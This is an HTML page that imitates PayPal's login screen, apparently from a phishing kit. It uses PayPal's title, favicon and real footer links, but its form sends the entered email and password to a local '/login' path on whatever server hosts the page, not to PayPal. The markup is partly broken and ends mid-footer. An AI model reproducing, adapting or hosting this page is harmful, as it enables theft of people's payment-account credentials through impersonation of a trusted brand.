<!DOCTYPE html>
<html lang="en" class=" desktop js ">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <title>Log in to your PayPal account</title>
    <link
    rel="shortcut icon"
    href="https://www.paypalobjects.com/en_US/i/icon/pp_favicon_x.ico"
    />
    <link rel="stylesheet" href="./index/LoginPage.css">
</head>

<body class="desktop">
    <div id="main" class="main" role="main">
        <div class="corral"></div>
        </section>
        <section id="login" class="login " data-role="page" data-title="Log in to your PayPal account">
            <div class="corral">
                <div id="content" class="contentContainer activeContent contentContainerBordered">
                    <header>
                        <p role="img" aria-label="PayPal Logo" class="paypal-logo paypal-logo-long"></p>
                    </header>
                    <h1 id="headerText" class="headerText  accessAid">Log in to your PayPal account</h1>
                    <div class="notifications"></div>
                    <form action="/login" method="post" class="proceed maskable" autocomplete="off" name="login" novalidate="">
                        <div id="passwordSection" class="clearfix splitEmail">
                            <div id="splitEmailSection" class="splitPhoneSection splitEmailSection">
                                </select>
                            </div>
                            <div class="textInput" id="emaildiv" style="z-index: 1;">
                                <div class="fieldWrapper ">
                                  <label for="email" class="fieldLabel">Email</label><input id="email" name="email" type="email" class="hasHelp  validateEmpty   " required="required" value="" autocomplete="username" placeholder="Email or mobile number" aria-describedby="emailErrorMessage"></div>
                                <div class="errorMessage" id="emailErrorMessage">
                                    <p class="emptyError hide">Required.</p>
                                </div>
                            </div>
                            <div id="passwordSection" class="clearfix showHideButtonForEligibleBrowser">
                                <div class="textInput  " id="passworddiv">
                                    <div class="fieldWrapper "><label for="password" class="fieldLabel">Password</label><input id="password" name="password" type="password" class="hasHelp  validateEmpty   pin-password" required="required" value="" placeholder="Password" aria-describedby="passwordErrorMessage"><label for="Show password" class="fieldLabel">Show password</label><button type="button" class="showPassword hide show-hide-password scTrack:unifiedlogin-show-password" id="Show password" pa-marked="1">Show</button><label for="Hide" class="fieldLabel">Hide</label><button type="button" class="hidePassword hide show-hide-password scTrack:unifiedlogin-hide-password" id="Hide" pa-marked="1">Hide</button><button class="pwFpIcon hide" id="pwFpIcon" pa-marked="1"></button></div>
                                    <div class="errorMessage" id="passwordErrorMessage">
                                    </div>
                                </div>
                            </div>
                        </div>
                        <div class="actions"><button class="button actionContinue scTrack:unifiedlogin-login-submit" type="submit" id="btnLogin" name="btnLogin" value="Login" pa-marked="1">Log In</button></div><input type="hidden" name="splitLoginContext" value="inputPassword"><input type="hidden" name="isCookiedHybridEmail" value="true">
                    </form>
                    <div class="forgotLink"><a href="https://www.paypal.com/authflow/password-recovery/?country.x=IN&amp;locale.x=en_GB&amp;redirectUri=%252Fsignin%252F" class="scTrack:unifiedlogin-click-forgot-password pwrLink" pa-marked="1">Forgotten password?</a></div>
                    <div class="pwr-modal forgotPasswordModal" id="password-recovery-modal">
                        <div class="monogram-small"></div>
                    </div>
                    <div id="signupContainer" class="signupContainer" data-hide-on-email="" data-hide-on-pass="">
                        <div class="loginSignUpSeparator "><span class="textInSeparator">or</span></div>
                        <button type="button" href="https://www.paypal.com/in/webapps/mpp/account-selection" class="button secondary scTrack:unifiedlogin-click-signup-button" id="createAccount" pa-marked="1">Sign Up</button>
                    </div>
                    <div id="tpdButtonContainer" class="signupContainer hide">
                        <div class="loginSignUpSeparator"><span class="textInSeparator">or</span></div>
                        <div class="actions"></div>
                    </div>
                    <div class="intentFooter "></div>
                </div>
            </div>
        </section>
        <div class="corral">
            <div class="contentContainer contentContainerLean">
            </div>
        </div>
        </section>
        < <footer class="footer" role="contentinfo">
            <div class="legalFooter">
                <ul class="footerGroup">
                    <li><a target="_blank" href="https://www.paypal.com/in/smarthelp/contact-us" pa-marked="1">Contact Us</a></li>
                    <li><a target="_blank" href="https://www.paypal.com/in/webapps/mpp/ua/privacy-full" pa-marked="1">Privacy</a></li>
                    <li><a target="_blank" href="https://www.paypal.com/in/webapps/mpp/ua/legalhub-full" pa-marked="1">Legal</a></li>
                    <li><a target="_blank" href="https://www.paypal.com/in/webapps/mpp/country-worldwide" pa-marked="1">Worldwide</a>
                        <div></div>